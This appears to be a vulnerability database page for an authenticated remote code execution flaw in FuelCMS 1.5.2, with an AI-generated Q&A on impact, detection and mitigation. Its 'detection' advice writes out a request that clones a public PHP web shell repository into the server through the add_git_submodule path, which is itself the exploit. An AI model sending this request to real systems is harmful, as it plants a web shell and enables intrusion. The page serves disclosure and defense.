CVE-2026-30461
Authenticated Remote Code Execution in FuelCMS 1.5.2 Installer.php
Publication date: 2026-04-15
Last updated on: 2026-04-20
Assigner: MITRE
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| thedaylightstudio | fuel_cms | 1.5.2 |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-77 | The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2026-30461 is an authenticated remote code execution (RCE) vulnerability in FuelCMS version 1.5.2. It exists in the add_git_submodule function accessible via the URL path /fuel/Installer/add_git_submodule/<module>. This function allows an authenticated user to add arbitrary Git submodules from any GitHub repository if the system is running in development mode with Git over SSH enabled.
By exploiting this vulnerability, an attacker can clone a malicious Git repository containing a PHP web shell into the FuelCMS installation. The attacker can then access and execute arbitrary PHP code on the server through the injected files, effectively gaining full remote code execution capabilities.
The vulnerability requires that FuelCMS is running in development mode, Git over SSH is properly configured, and a valid .git directory exists in the root of FuelCMS.
How can this vulnerability impact me? :
This vulnerability can have severe impacts including unauthorized remote code execution on the affected server. An attacker with valid authentication can execute arbitrary system commands, potentially leading to full system compromise.
- Loss of confidentiality: sensitive data on the server can be accessed or exfiltrated.
- Loss of integrity: attacker can modify or inject malicious code or data.
- Loss of availability: attacker could disrupt services or delete critical files.
Because the attack requires only low privileges and no user interaction beyond authentication, it poses a critical security risk especially in development environments where this mode is enabled.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by checking if your FuelCMS instance is running in development mode with Git over SSH enabled and a valid .git directory present. Specifically, you can test if the vulnerable add_git_submodule function is accessible by sending an authenticated GET request to the URL path /fuel/Installer/add_git_submodule/<repository>/<module>.
A practical detection command involves sending a GET request similar to the proof of concept: GET /fuel/Installer/add_git_submodule/[email protected]:flozz/p0wny-shell.git/test. If the server responds with HTTP 200 OK and zero content length, the vulnerability is likely present.
- Use curl or a similar HTTP client with valid authentication to send the GET request to /fuel/Installer/add_git_submodule/[email protected]:flozz/p0wny-shell.git/test.
- Check the server response code and content length to confirm if the submodule addition is successful.
- Verify if Git over SSH is enabled and configured on the server.
- Confirm that the FuelCMS instance is running in development mode and that a .git directory exists in the root directory.
What immediate steps should I take to mitigate this vulnerability?
To mitigate this vulnerability immediately, you should disable development mode on your FuelCMS instance to prevent access to the add_git_submodule function.
Additionally, restrict or disable Git over SSH access on the server to prevent unauthorized Git submodule additions.
Ensure that only trusted and authorized users have authenticated access to the FuelCMS system, as exploitation requires authentication.
If possible, remove or restrict the .git directory in the root of the FuelCMS installation to limit Git operations.
Since the vendor is unlikely to issue a fix, consider isolating or upgrading the system to a more secure environment or CMS version if available.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
The CVE-2026-30461 vulnerability allows authenticated users to execute arbitrary code remotely on FuelCMS installations running in development mode with Git over SSH enabled. This can lead to unauthorized access, modification, or destruction of sensitive data hosted on the affected system.
Such unauthorized access and potential data breaches can compromise the confidentiality, integrity, and availability of personal or sensitive information, which are core requirements of common standards and regulations like GDPR and HIPAA.
Therefore, if exploited, this vulnerability could result in non-compliance with these regulations due to failure to adequately protect sensitive data and maintain secure systems.